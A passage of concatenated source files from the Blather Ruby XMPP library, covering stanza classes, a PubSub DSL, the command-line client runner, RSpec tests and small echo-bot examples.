      node
    end

    # Convert the object to a proper node then convert it to a string
    #
    # @return [String]
    def to_xml(*args)
      to_node.to_xml(*args)
    end

    # @private
    def inspect
      "Stream Error (#{@name}): #{self.text}" + (self.extras.empty? ? '' : " [#{self.extras}]")
    end
    # @private
    alias_method :to_s, :inspect
  end  # StreamError
end  # Blather
<file_sep>/lib/blather/stanza.rb
module Blather
  # # Base XMPP Stanza
  #
  # All stanzas inherit this class. It provides a set of methods and helpers
  # common to all XMPP Stanzas
  #
  # @handler :stanza
  class Stanza < XMPPNode
    # @private
    @@last_id = 0
    # @private
    @@handler_list = []

    # Class-level handler hierarchy (most specific handler first);
    # attr_writer below allows per-instance additions
    class_attribute :handler_hierarchy
    attr_writer :handler_hierarchy

    # Registers a callback onto the callback stack
    #
    # @param [Symbol] handler the name of the handler
    # @param [Symbol, String, nil] name the name of the first element in the
    # stanza. If nil the inherited name will be used. If that's nil the
    # handler name will be used.
    # @param [String, nil] ns the namespace of the stanza
    def self.register(handler, name = nil, ns = nil)
      @@handler_list << handler
      # prepend so the most specific handler is checked first; :stanza
      # always remains the final fallback
      self.handler_hierarchy ||= [:stanza]
      self.handler_hierarchy = [handler] + self.handler_hierarchy

      name = name || self.registered_name || handler
      super name, ns
    end

    # Start each instance with an empty instance-level handler list
    def initialize(*args)
      super
      @handler_hierarchy = []
    end

    # The complete handler hierarchy for this stanza: instance-level
    # handlers followed by the class-level hierarchy
    #
    # @return [Array<Symbol>]
    def handler_hierarchy
      @handler_hierarchy + self.class.handler_hierarchy
    end

    # The handler stack for the current stanza class
    #
    # @return [Array<Symbol>]
    def self.handler_list
      @@handler_list
    end

    # Helper method that creates a unique ID for stanzas
    #
    # @return [String] a new unique ID
    def self.next_id
      @@last_id += 1
      'blather%04x' % @@last_id
    end

    # Check if the stanza is an error stanza
    #
    # @return [true, false]
    def error?
      self.type == :error
    end

    # Creates a copy with to and from swapped
    #
    # @param [Hash] opts options to pass to reply!
    # @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
    #
    # @return [Blather::Stanza]
    def reply(opts = {})
      self.dup.reply! opts
    end

    # Swaps from and to
    #
    # @param [Hash] opts Misc options
    # @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
    #
    # @return [self]
    def reply!(opts = {})
      opts = {:remove_children => false}.merge opts
      self.to, self.from = self.from, self.to
      self.children.remove if opts[:remove_children]
      self
    end

    # Get the stanza's ID
    #
    # @return [String, nil]
    def id
      read_attr :id
    end

    # Set the stanza's ID
    #
    # @param [#to_s] id the new stanza ID
    def id=(id)
      write_attr :id, id
    end

    # Get the stanza's to
    #
    # @return [Blather::JID, nil]
    def to
      JID.new(self[:to]) if self[:to]
    end

    # Set the stanza's to field
    #
    # @param [#to_s] to the new JID for the to field
    def to=(to)
      write_attr :to, to
    end

    # Get the stanza's from
    #
    # @return [Blather::JID, nil]
    def from
      JID.new(self[:from]) if self[:from]
    end

    # Set the stanza's from field
    #
    # @param [#to_s] from the new JID for the from field
    def from=(from)
      write_attr :from, from
    end

    # Get the stanza's type
    #
    # @return [Symbol, nil]
    def type
      read_attr :type, :to_sym
    end

    # Set the stanza's type
    #
    # @param [#to_s] type the new stanza type
    def type=(type)
      write_attr :type, type
    end

    # Create an error stanza from the current stanza
    #
    # @param [String] name the error name
    # @param [<Blather::StanzaError::VALID_TYPES>] type the error type
    # @param [String, nil] text the error text
    # @param [Array<XML::Node>] extras an array of extra nodes to attach to
    # the error
    #
    # @return [Blather::StanzaError]
    def as_error(name, type, text = nil, extras = [])
      StanzaError.new self, name, type, text, extras
    end

    protected

    # Swap to/from exactly once, no matter how often this is called
    # @private
    def reply_if_needed!
      unless @reversed_endpoints
        reply!
        @reversed_endpoints = true
      end
      self
    end
  end
end
<file_sep>/lib/blather/client/dsl/pubsub.rb
module Blather
  module DSL

    # A helper class for providing a simplified PubSub interface to the
    # DSL
    class PubSub
      attr_accessor :host

      # Create a new pubsub DSL
      #
      # @param [Blather::Client] client the client who's connection will be used
      # @param [#to_s] host the PubSub host
      def initialize(client, host)
        @client = client
        @host = host
      end

      # Retrieve Affiliations
      #
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Hash] affiliations See {Blather::Stanza::PubSub::Affiliations#list}
      def affiliations(host = nil, &callback)
        request Stanza::PubSub::Affiliations.new(:get, send_to(host)), :list, callback
      end

      # Retrieve Subscriptions
      #
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Hash] affiliations See {Blather::Stanza::PubSub::Subscriptions#list}
      def subscriptions(host = nil, &callback)
        request Stanza::PubSub::Subscriptions.new(:get, send_to(host)), :list, callback
      end

      # Discover Nodes
      #
      # @param [#to_s] path the node path
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Array<Blather::Stanza::DiscoItems::Item>] items
      def nodes(path = nil, host = nil, &callback)
        path ||= '/'
        stanza = Stanza::DiscoItems.new(:get, path)
        stanza.to = send_to(host)
        request stanza, :items, callback
      end

      # Discover node information
      #
      # @param [#to_s] path the node path
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza::DiscoInfo>] info
      def node(path, host = nil, &callback)
        stanza = Stanza::DiscoInfo.new(:get, path)
        stanza.to = send_to(host)
        request stanza, nil, callback
      end

      # Retrieve items for a node
      #
      # @param [#to_s] path the node path
      # @param [Array<#to_s>] list a list of IDs to retrieve
      # @param [Fixnum, #to_s] max the maximum number of items to return
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Array<Blather::Stanza::PubSub::PubSubItem>] items see {Blather::Stanza::PubSub::Items#items}
      def items(path, list = [], max = nil, host = nil, &callback)
        request(
          Stanza::PubSub::Items.request(send_to(host), path, list, max),
          :items,
          callback
        )
      end

      # Subscribe to a node
      #
      # @param [#to_s] node the node to subscribe to
      # @param [Blather::JID, #to_s] jid is the jid that should be used.
      # Defaults to the stripped current JID
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def subscribe(node, jid = nil, host = nil)
        jid ||= client.jid.stripped
        stanza = Stanza::PubSub::Subscribe.new(:set, send_to(host), node, jid)
        request(stanza) { |n| yield n if block_given? }
      end

      # Unsubscribe from a node
      #
      # @param [#to_s] node the node to unsubscribe from
      # @param [Blather::JID, #to_s] jid is the jid that should be used.
      # Defaults to the stripped current JID
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def unsubscribe(node, jid = nil, subid = nil, host = nil)
        jid ||= client.jid.stripped
        stanza = Stanza::PubSub::Unsubscribe.new(:set, send_to(host), node, jid, subid)
        request(stanza) { |n| yield n if block_given? }
      end

      # Publish an item to a node
      #
      # @param [#to_s] node the node to publish to
      # @param [#to_s] payload the payload to send see {Blather::Stanza::PubSub::Publish}
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def publish(node, payload, host = nil)
        stanza = Stanza::PubSub::Publish.new(send_to(host), node, :set, payload)
        request(stanza) { |n| yield n if block_given? }
      end

      # Delete items from a node
      #
      # @param [#to_s] node the node to delete from
      # @param [Array<#to_s>] ids a list of ids to delete
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def retract(node, ids = [], host = nil)
        stanza = Stanza::PubSub::Retract.new(send_to(host), node, :set, ids)
        request(stanza) { |n| yield n if block_given? }
      end

      # Create a node
      #
      # @param [#to_s] node the node to create
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @param [optional, Blather::Stanza::X] configuration the additional configuration to be set to created node
      # @yield [Blather::Stanza] stanza the reply stanza
      def create(node, host = nil, configuration = nil)
        stanza = Stanza::PubSub::Create.new(:set, send_to(host), node)
        stanza.configure_node << configuration if configuration
        request(stanza) { |n| yield n if block_given? }
      end

      # Purge all node items
      #
      # @param [#to_s] node the node to purge
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def purge(node, host = nil)
        stanza = Stanza::PubSubOwner::Purge.new(:set, send_to(host), node)
        request(stanza) { |n| yield n if block_given? }
      end

      # Delete a node
      #
      # @param [#to_s] node the node to delete
      # @param [#to_s] host the PubSub host (defaults to the initialized host)
      # @yield [Blather::Stanza] stanza the reply stanza
      def delete(node, host = nil)
        stanza = Stanza::PubSubOwner::Delete.new(:set, send_to(host), node)
        request(stanza) { |n| yield n if block_given? }
      end

      private

      # Write +node+ to the wire. The reply is handed to +block+ when one
      # is given; otherwise +callback+ receives either the raw reply or,
      # when +method+ is set, the result of calling +method+ on the reply.
      def request(node, method = nil, callback = nil, &block)
        unless block_given?
          block = lambda do |node|
            callback.call(method ? node.__send__(method) : node)
          end
        end
        client.write_with_handler(node, &block)
      end

      # Resolve the destination host: an explicit argument wins over the
      # host given at construction time; raise when neither is available
      def send_to(host = nil)
        raise 'You must provide a host' unless (host ||= @host)
        host
      end

      # The underlying Blather::Client
      def client
        @client
      end
    end  # PubSub
  end  # DSL
end  # Blather
<file_sep>/lib/blather/stanza/pubsub_owner/purge.rb
module Blather
  class Stanza
    class PubSubOwner

      # # PubSubOwner Purge Stanza
      #
      # [XEP-0060 Section 8.5 - Purge All Node Items](http://xmpp.org/extensions/xep-0060.html#owner-purge)
      #
      # @handler :pubsub_purge
      class Purge < PubSubOwner

        register :pubsub_purge, :purge, self.registered_ns

        # Create a new purge stanza
        #
        # @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
        # @param [String] host the host to send the request to
        # @param [String] node the name of the node to purge
        def self.new(type = :set, host = nil, node = nil)
          new_node = super(type, host)
          new_node.node = node
          new_node
        end

        # Get the name of the node to purge
        #
        # @return [String]
        def node
          purge_node[:node]
        end

        # Set the name of the node to purge
        #
        # @param [String] node
        def node=(node)
          purge_node[:node] = node
        end

        # Get or create the actual purge node on the stanza
        #
        # @return [Blather::XMPPNode]
        def purge_node
          unless purge_node = pubsub.find_first('ns:purge', :ns => self.class.registered_ns)
            self.pubsub << (purge_node = XMPPNode.new('purge', self.document))
            purge_node.namespace = self.pubsub.namespace
          end
          purge_node
        end
      end  # Purge
    end  # PubSubOwner
  end  # Stanza
end  # Blather
<file_sep>/lib/blather/client.rb
require 'optparse'

# Pull in the DSL and expose it at the top level unless the user's
# script already loaded it.
if !defined?(Blather::DSL)
  require File.join(File.dirname(__FILE__), *%w[client dsl])
  include Blather::DSL
end

options = {}
optparse = OptionParser.new do |opts|
  opts.banner = "Run with #{$0} [options] user@server/resource password [host] [port]"

  opts.on('-D', '--debug', 'Run in debug mode (you will see all XMPP communication)') do
    options[:debug] = true
  end

  opts.on('-d', '--daemonize', 'Daemonize the process') do |daemonize|
    options[:daemonize] = daemonize
  end

  opts.on('--pid=[PID]', 'Write the PID to this file') do |pid|
    if !File.writable?(File.dirname(pid))
      # BUGFIX: this message used to say "log file" for the PID file
      $stderr.puts "Unable to write PID file to #{pid}"
      exit 1
    end
    options[:pid] = pid
  end

  opts.on('--log=[LOG]', 'Write to the [LOG] file instead of stdout/stderr') do |log|
    if !File.writable?(File.dirname(log))
      $stderr.puts "Unable to write log file to #{log}"
      exit 1
    end
    options[:log] = log
  end

  opts.on('--certs=[CERTS DIRECTORY]', 'The directory path where the trusted certificates are stored') do |certs|
    if !File.directory?(certs)
      $stderr.puts "The certs directory path (#{certs}) is no good."
      exit 1
    end
    options[:certs] = certs
  end

  opts.on_tail('-h', '--help', 'Show this message') do
    puts opts
    exit
  end

  opts.on_tail('-v', '--version', 'Show version') do
    require 'yaml'
    version = YAML.load_file File.join(File.dirname(__FILE__), %w[.. .. VERSION.yml])
    puts "Blather v#{version[:major]}.#{version[:minor]}.#{version[:patch]}"
    exit
  end
end
optparse.parse!

# The client is configured and run only after the user's script has been
# fully evaluated, hence the at_exit hook.
at_exit do
  unless client.setup?
    if ARGV.length < 2
      puts optparse
      exit 1
    end
    client.setup(*ARGV)
  end

  # Redirect IO, install signal handlers and spin up the reactor
  def at_exit_run(options)
    $stdin.reopen("/dev/null") if options[:daemonize] && $stdin.tty?
    if options[:log]
      log = File.new(options[:log], 'a')
      log.sync = options[:debug] # flush every write while debugging
      $stdout.reopen log
      $stderr.reopen $stdout
    end
    Blather.logger.level = Logger::DEBUG if options[:debug]
    trap(:INT) { EM.stop }
    trap(:TERM) { EM.stop }
    EM.run { client.run }
  end

  if options[:daemonize]
    pid = fork do
      Process.setsid # detach from the controlling terminal
      exit if fork   # double-fork so the daemon is not a session leader
      File.open(options[:pid], 'w') { |f| f << Process.pid } if options[:pid]
      at_exit_run options
      FileUtils.rm(options[:pid]) if options[:pid] # clean up after EM stops
    end
    ::Process.detach pid
    exit
  else
    at_exit_run options
  end
end
<file_sep>/spec/blather/stream/ssl_spec.rb
require 'spec_helper'
describe Blather::CertStore do
  # Fixture directory contains the trusted CA certificate
  let(:cert_dir) { File.expand_path '../../fixtures', File.dirname(__FILE__) }
  let(:cert_path) { File.join cert_dir, 'certificate.crt' }
  let(:cert) { File.read cert_path }

  subject do
    Blather::CertStore.new cert_dir
  end

  it 'can verify valid cert' do
    expect(subject.trusted?(cert)).to be true
  end

  # An unparsable blob yields nil rather than false
  it 'can verify invalid cert' do
    expect(subject.trusted?('foo bar baz')).to be_nil
  end

  # A store pointed at a directory without the CA cert must not trust it
  it 'cannot verify when the cert authority is not trusted' do
    @store = Blather::CertStore.new("../")
    expect(@store.trusted?(cert)).to be false
  end
end
<file_sep>/spec/blather/stanza/pubsub_owner/purge_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSubOwner::Purge do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:purge, 'http://jabber.org/protocol/pubsub#owner')).to eq(Blather::Stanza::PubSubOwner::Purge)
  end

  # Parsing the XEP-0060 Section 8.5 example must yield a Purge stanza
  it 'can be imported' do
    expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSubOwner::Purge
    <iq type='set'
        from='<EMAIL>/elsinore'
        to='pubsub.shakespeare.lit'
        id='purge1'>
      <pubsub xmlns='http://jabber.org/protocol/pubsub#owner'>
        <purge node='princely_musings'/>
      </pubsub>
    </iq>
    NODE
  end

  it 'ensures an purge node is present on create' do
    purge = Blather::Stanza::PubSubOwner::Purge.new
    expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
  end

  # #purge_node lazily recreates the element after it has been removed
  it 'ensures an purge node exists when calling #purge_node' do
    purge = Blather::Stanza::PubSubOwner::Purge.new
    purge.pubsub.remove_children :purge
    expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).to be_empty

    expect(purge.purge_node).not_to be_nil
    expect(purge.find('//ns:pubsub/ns:purge', :ns => Blather::Stanza::PubSubOwner.registered_ns)).not_to be_empty
  end

  it 'defaults to a set node' do
    purge = Blather::Stanza::PubSubOwner::Purge.new
    expect(purge.type).to eq(:set)
  end

  it 'sets the host if requested' do
    purge = Blather::Stanza::PubSubOwner::Purge.new :set, 'pubsub.jabber.local'
    expect(purge.to).to eq(Blather::JID.new('pubsub.jabber.local'))
  end

  it 'sets the node' do
    purge = Blather::Stanza::PubSubOwner::Purge.new :set, 'host', 'node-name'
    expect(purge.node).to eq('node-name')
  end
end
<file_sep>/lib/blather/stanza/presence/muc_user.rb
require 'blather/stanza/muc/muc_user_base'
module Blather
  class Stanza
    class Presence

      # MUC User presence: a presence stanza carrying an <x/> payload in
      # the muc#user namespace, exposing the <item/> (affiliation, role,
      # jid) and any <status/> codes.
      #
      # [XEP-0045 Multi-User Chat](http://xmpp.org/extensions/xep-0045.html)
      class MUCUser < Presence
        include Blather::Stanza::MUC::MUCUserBase

        def self.decorator_modules
          super + [Blather::Stanza::MUC::MUCUserBase]
        end

        register :muc_user_presence, :x, MUC_USER_NAMESPACE

        module InstanceMethods
          # @return [Symbol, nil] the user's affiliation from the <item/>
          def affiliation
            item.affiliation
          end

          def affiliation=(val)
            item.affiliation = val
          end

          # @return [Symbol, nil] the user's role from the <item/>
          def role
            item.role
          end

          def role=(val)
            item.role = val
          end

          # @return [String, nil] the real JID advertised in the <item/>
          def jid
            item.jid
          end

          def jid=(val)
            item.jid = val
          end

          # @return [Array<Integer>] all <status/> codes
          def status_codes
            status.map &:code
          end

          # Replace all <status/> children with the given codes
          def status_codes=(val)
            muc_user.remove_children :status
            val.each do |code|
              muc_user << Status.new(code)
            end
          end

          # Find (or lazily create) the <item/> child, wrapped as an Item
          def item
            if item = muc_user.find_first('ns:item', :ns => MUCUser.registered_ns)
              Item.new item
            else
              muc_user << (item = Item.new nil, nil, nil, self.document)
              item
            end
          end

          # All <status/> children wrapped as Status objects
          def status
            muc_user.find('ns:status', :ns => MUCUser.registered_ns).map do |status|
              Status.new status
            end
          end
        end

        include InstanceMethods

        # <item/> fragment carrying affiliation, role and jid attributes
        class Item < XMPPNode
          def self.new(affiliation = nil, role = nil, jid = nil, document = nil)
            new_node = super :item, document

            case affiliation
            when self
              # already an Item; hand it straight back
              affiliation.document ||= document
              return affiliation
            when Nokogiri::XML::Node
              new_node.inherit affiliation
            when Hash
              new_node.affiliation = affiliation[:affiliation]
              new_node.role = affiliation[:role]
              new_node.jid = affiliation[:jid]
            else
              new_node.affiliation = affiliation
              new_node.role = role
              new_node.jid = jid
            end
            new_node
          end

          def affiliation
            read_attr :affiliation, :to_sym
          end

          def affiliation=(val)
            write_attr :affiliation, val
          end

          def role
            read_attr :role, :to_sym
          end

          def role=(val)
            write_attr :role, val
          end

          def jid
            read_attr :jid
          end

          def jid=(val)
            write_attr :jid, val
          end
        end

        # <status/> fragment carrying a numeric code attribute
        class Status < XMPPNode
          def self.new(code = nil)
            new_node = super :status

            case code
            when self
              # BUGFIX: was `when self.class`, which evaluates to ::Class
              # inside a class method and therefore never matched an
              # existing Status instance (cf. Item.new above)
              return code
            when Nokogiri::XML::Node
              new_node.inherit code
            when Hash
              new_node.code = code[:code]
            else
              new_node.code = code
            end
            new_node
          end

          def code
            read_attr :code, :to_i
          end

          def code=(val)
            write_attr :code, val
          end
        end
      end # MUCUser
    end # Presence
  end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/iq/roster.rb
module Blather
  class Stanza
    class Iq

      # # Roster Stanza
      #
      # [RFC 3921 Section 7 - Roster Management](http://xmpp.org/rfcs/rfc3921.html#roster)
      #
      # @handler :roster
      class Roster < Query
        register :roster, nil, 'jabber:iq:roster'

        # Create a new roster stanza and (optionally) load it with an item
        #
        # @param [<Blather::Stanza::Iq::VALID_TYPES>] type the stanza type
        # @param [Blather::XMPPNode] item a roster item
        def self.new(type = nil, item = nil)
          node = super type
          node.query << item if item
          node
        end

        # Inherit the XMPPNode to create a proper Roster object.
        # Creates RosterItem objects out of each roster item as well.
        #
        # @param [Blather::XMPPNode] node a node to inherit
        def inherit(node)
          # remove the current set of nodes
          remove_children :item
          super
          # transmogrify nodes into RosterItems: append the wrapped copy,
          # then remove the plain original
          items.each { |i| query << RosterItem.new(i); i.remove }
          self
        end

        # The list of roster items
        #
        # NOTE(review): '//ns:item' is a document-absolute search rather
        # than one scoped to this query element -- presumably safe for a
        # roster IQ, which carries a single query; confirm before reuse.
        #
        # @return [Array<Blather::Stanza::Iq::Roster::RosterItem>]
        def items
          query.find('//ns:item', :ns => self.class.registered_ns).map do |i|
            RosterItem.new i
          end
        end

        # The provided roster version if available
        # (the 'ver' attribute on the query element)
        #
        # @return [String]
        def version
          query[:ver]
        end

        # # RosterItem Fragment
        #
        # Individual roster items.
        # This is a convenience class to attach methods to the node
        class RosterItem < XMPPNode
          register :item, Roster.registered_ns

          # Create a new RosterItem
          # @overload new(XML::Node)
          #   Create a RosterItem by inheriting a node
          #   @param [XML::Node] node an xml node to inherit
          # @overload new(opts)
          #   Create a RosterItem through a hash of options
          #   @param [Hash] opts the options
          #   @option opts [Blather::JID, String, nil] :jid the JID of the item
          #   @option opts [String, nil] :name the alias to give the JID
          #   @option opts [Symbol, nil] :subscription the subscription status of
          #   the RosterItem must be one of
          #   Blather::RosterItem::VALID_SUBSCRIPTION_TYPES
          #   @option opts [:subscribe, nil] :ask the ask value of the RosterItem
          #   @option opts [Array<#to_s>] :groups the group names the RosterItem is a member of
          # @overload new(jid = nil, name = nil, subscription = nil, ask = nil)
          #   @param [Blather::JID, String, nil] jid the JID of the item
          #   @param [String, nil] name the alias to give the JID
          #   @param [Symbol, nil] subscription the subscription status of the
          #   RosterItem must be one of
          #   Blather::RosterItem::VALID_SUBSCRIPTION_TYPES
          #   @param [:subscribe, nil] ask the ask value of the RosterItem
          #   @param [Array<#to_s>] groups the group names the RosterItem is a member of
          def self.new(jid = nil, name = nil, subscription = nil, ask = nil, groups = nil)
            new_node = super :item

            case jid
            when Nokogiri::XML::Node
              new_node.inherit jid
            when Hash
              new_node.jid = jid[:jid]
              new_node.name = jid[:name]
              new_node.subscription = jid[:subscription]
              new_node.ask = jid[:ask]
              new_node.groups = jid[:groups]
            else
              new_node.jid = jid
              new_node.name = name
              new_node.subscription = subscription
              new_node.ask = ask
              new_node.groups = groups
            end
            new_node
          end

          # Get the JID attached to the item
          #
          # @return [Blather::JID, nil]
          def jid
            (j = self[:jid]) ? JID.new(j) : nil
          end

          # Set the JID of the item; stored stripped (no resource)
          #
          # @param [Blather::JID, String, nil] jid the new JID
          def jid=(jid)
            write_attr :jid, (jid.nil?) ? nil : JID.new(jid).stripped
          end

          # Get the item name
          #
          # @return [String, nil]
          def name
            read_attr :name
          end

          # Set the item name
          #
          # @param [#to_s] name the name of the item
          def name=(name)
            write_attr :name, name
          end

          # Get the subscription value of the item
          #
          # @return [<:both, :from, :none, :remove, :to>]
          def subscription
            read_attr :subscription, :to_sym
          end

          # Set the subscription value of the item
          #
          # @param [<:both, :from, :none, :remove, :to>] subscription
          def subscription=(subscription)
            write_attr :subscription, subscription
          end

          # Get the ask value of the item
          #
          # @return [<:subscribe, nil>]
          def ask
            read_attr :ask, :to_sym
          end

          # Set the ask value of the item
          #
          # @param [<:subscribe, nil>] ask
          def ask=(ask)
            write_attr :ask, ask
          end

          # The groups roster item belongs to
          #
          # @return [Array<String>]
          def groups
            find('child::*[local-name()="group"]').map { |g| g.content }
          end

          # Set the roster item's groups (duplicates are dropped)
          #
          # @param [Array<#to_s>] new_groups an array of group names
          def groups=(new_groups)
            remove_children :group
            if new_groups
              new_groups.uniq.each do |g|
                self << (group = XMPPNode.new(:group, self.document))
                group.content = g
              end
            end
          end

          # Convert the roster item to a proper stanza all wrapped up
          # This facilitates new subscriptions
          #
          # @return [Blather::Stanza::Iq::Roster]
          def to_stanza
            Roster.new(:set, self)
          end
        end #RosterItem
      end #Roster
    end #Iq
  end #Stanza
end
<file_sep>/examples/MUC_echo.rb
require 'blather/client/dsl'
# Echoes every groupchat message (other than our own) back to the room.
module MUC
  extend Blather::DSL

  when_ready do
    puts "Connected ! send messages to #{jid.stripped}."
    join 'room_name', 'nick_name'
  end

  # Skip delayed (history) messages via `delay: nil` and our own
  # messages via the sender check.
  message :groupchat?, :body, proc { |m| m.from != jid.stripped }, delay: nil do |m|
    echo = Blather::Stanza::Message.new
    # BUGFIX: the original assigned the undefined local `room`; the
    # room's bare JID is the inbound stanza's from with the nickname
    # resource stripped.
    echo.to = m.from.stripped
    echo.body = m.body
    echo.type = 'groupchat'
    client.write echo
  end
end

MUC.setup 'username', '<PASSWORD>'

EM.run { MUC.run }
<file_sep>/spec/blather/stanza/presence/muc_spec.rb
require 'spec_helper'
# Minimal XEP-0045 room-join presence used as an import fixture
def muc_xml
  <<-XML
  <presence from='<EMAIL>/pda'
      id='n13mt3l'
      to='<EMAIL>/thirdwitch'>
    <x xmlns='http://jabber.org/protocol/muc'/>
  </presence>
  XML
end

describe 'Blather::Stanza::Presence::MUC' do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:x, 'http://jabber.org/protocol/muc' )).to eq(Blather::Stanza::Presence::MUC)
  end

  # Importing must decorate the presence with the MUC instance methods
  it 'must be importable' do
    c = Blather::XMPPNode.parse(muc_xml)
    expect(c).to be_kind_of Blather::Stanza::Presence::MUC::InstanceMethods
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns).count).to eq(1)
  end

  it 'ensures a form node is present on create' do
    c = Blather::Stanza::Presence::MUC.new
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).not_to be_empty
  end

  # #muc lazily recreates the <x/> element after it has been removed
  it 'ensures a form node exists when calling #muc' do
    c = Blather::Stanza::Presence::MUC.new
    c.remove_children :x
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).to be_empty

    expect(c.muc).not_to be_nil
    expect(c.xpath('ns:x', :ns => Blather::Stanza::Presence::MUC.registered_ns)).not_to be_empty
  end
end
<file_sep>/yard/templates/default/class/setup.rb
# YARD template extension: inserts a "handlers" section on class pages,
# rendered from the @handler tags declared throughout the library.
def init
  super
  sections.place(:handlers).after(:box_info)
end

# Walk the inheritance tree collecting each @handler tag's name; render
# the :handlers erb partial only when at least one handler was found.
def handlers
  @handler_stack = object.inheritance_tree.each_with_object([]) do |ancestor, stack|
    next unless ancestor.respond_to?(:tag) && ancestor.tag(:handler)
    stack << ancestor.tag(:handler).name
  end
  return if @handler_stack.empty?
  erb(:handlers)
end
<file_sep>/examples/stream_only.rb
#!/usr/bin/env ruby
require 'rubygems'
require 'blather'

# Bare-bones stream usage without the DSL or client wrapper: the handler
# object passed to Stream::Client receives lifecycle callbacks directly.
trap(:INT) { EM.stop }
trap(:TERM) { EM.stop }
EM.run do
  Blather::Stream::Client.start(Class.new {
    attr_accessor :jid

    # Called once the stream is negotiated; announce availability
    def post_init(stream, jid = nil)
      @stream = stream
      self.jid = jid
      @stream.send_data Blather::Stanza::Presence::Status.new
      puts "Stream started!"
    end

    # Echo each inbound stanza back to its sender
    def receive_data(stanza)
      @stream.send_data stanza.reply!
    end

    def unbind
      puts "Stream ended!"
    end
  }.new, '<EMAIL>', 'echo')
end
<file_sep>/lib/blather.rb
# Require the necessary files
%w[
rubygems
eventmachine
niceogiri
ipaddr
digest/md5
digest/sha1
logger
openssl
active_support/core_ext/class/attribute
active_support/core_ext/object/blank
blather/core_ext/eventmachine
blather/core_ext/ipaddr
blather/cert_store
blather/errors
blather/errors/sasl_error
blather/errors/stanza_error
blather/errors/stream_error
blather/file_transfer
blather/file_transfer/ibb
blather/file_transfer/s5b
blather/jid
blather/roster
blather/roster_item
blather/xmpp_node
blather/stanza
blather/stanza/iq
blather/stanza/iq/command
blather/stanza/iq/ibb
blather/stanza/iq/ping
blather/stanza/iq/query
blather/stanza/iq/ibr
blather/stanza/iq/roster
blather/stanza/iq/s5b
blather/stanza/iq/si
blather/stanza/iq/vcard
blather/stanza/disco
blather/stanza/disco/disco_info
blather/stanza/disco/disco_items
blather/stanza/disco/capabilities
blather/stanza/message
blather/stanza/message/muc_user
blather/stanza/presence
blather/stanza/presence/c
blather/stanza/presence/status
blather/stanza/presence/subscription
blather/stanza/presence/muc
blather/stanza/presence/muc_user
blather/stanza/pubsub
blather/stanza/pubsub/affiliations
blather/stanza/pubsub/create
blather/stanza/pubsub/event
blather/stanza/pubsub/items
blather/stanza/pubsub/publish
blather/stanza/pubsub/retract
blather/stanza/pubsub/subscribe
blather/stanza/pubsub/subscription
blather/stanza/pubsub/subscriptions
blather/stanza/pubsub/unsubscribe
blather/stanza/pubsub_owner
blather/stanza/pubsub_owner/delete
blather/stanza/pubsub_owner/purge
blather/stanza/x
blather/stream
blather/stream/client
blather/stream/component
blather/stream/parser
blather/stream/features
blather/stream/features/resource
blather/stream/features/sasl
blather/stream/features/session
blather/stream/features/tls
blather/stream/features/register
].each { |r| require r }
module Blather
  @@logger = nil

  class << self
    # Default log level forwarded to by Blather.log. Writer only: the
    # reader is defined explicitly below so it can supply the :debug
    # default lazily (the original attr_accessor's reader was shadowed
    # by that definition anyway).
    attr_writer :default_log_level

    # The active logger; defaults to an INFO-level Logger on $stdout
    def logger
      @@logger ||= Logger.new($stdout).tap { |logger| logger.level = Logger::INFO }
    end

    def logger=(logger)
      @@logger = logger
    end

    def default_log_level
      @default_log_level ||= :debug # by default is debug (as it used to be)
    end

    # Forward +message+ to the logger at the default log level
    def log(message)
      logger.send self.default_log_level, message
    end
  end
end
<file_sep>/lib/blather/stanza/presence.rb
module Blather
class Stanza
# # Presence Stanza
#
# [RFC 3921 Section 2.2 - Presence Syntax](http://xmpp.org/rfcs/rfc3921.html#stanzas-presence)
#
# Within Blather most of the interaction with Presence stanzas will be
# through one of its child classes: Status or Subscription.
#
# Presence stanzas are used to express an entity's current network
# availability (offline or online, along with various sub-states of the
# latter and optional user-defined descriptive text), and to notify other
# entities of that availability. Presence stanzas are also used to negotiate
# and manage subscriptions to the presence of other entities.
#
# ## "Type" Attribute
#
# The `type` attribute of a presence stanza is optional. A presence stanza
# that does not possess a `type` attribute is used to signal to the server
# that the sender is online and available for communication. If included,
# the `type` attribute specifies a lack of availability, a request to manage
# a subscription to another entity's presence, a request for another
# entity's current presence, or an error related to a previously-sent
# presence stanza. If included, the `type` attribute must have one of the
# following values:
#
# * `:unavailable` -- Signals that the entity is no longer available for
# communication
#
# * `:subscribe` -- The sender wishes to subscribe to the recipient's
# presence.
#
# * `:subscribed` -- The sender has allowed the recipient to receive their
# presence.
#
# * `:unsubscribe` -- The sender is unsubscribing from another entity's
# presence.
#
# * `:unsubscribed` -- The subscription request has been denied or a
# previously-granted subscription has been cancelled.
#
# * `:probe` -- A request for an entity's current presence; should be
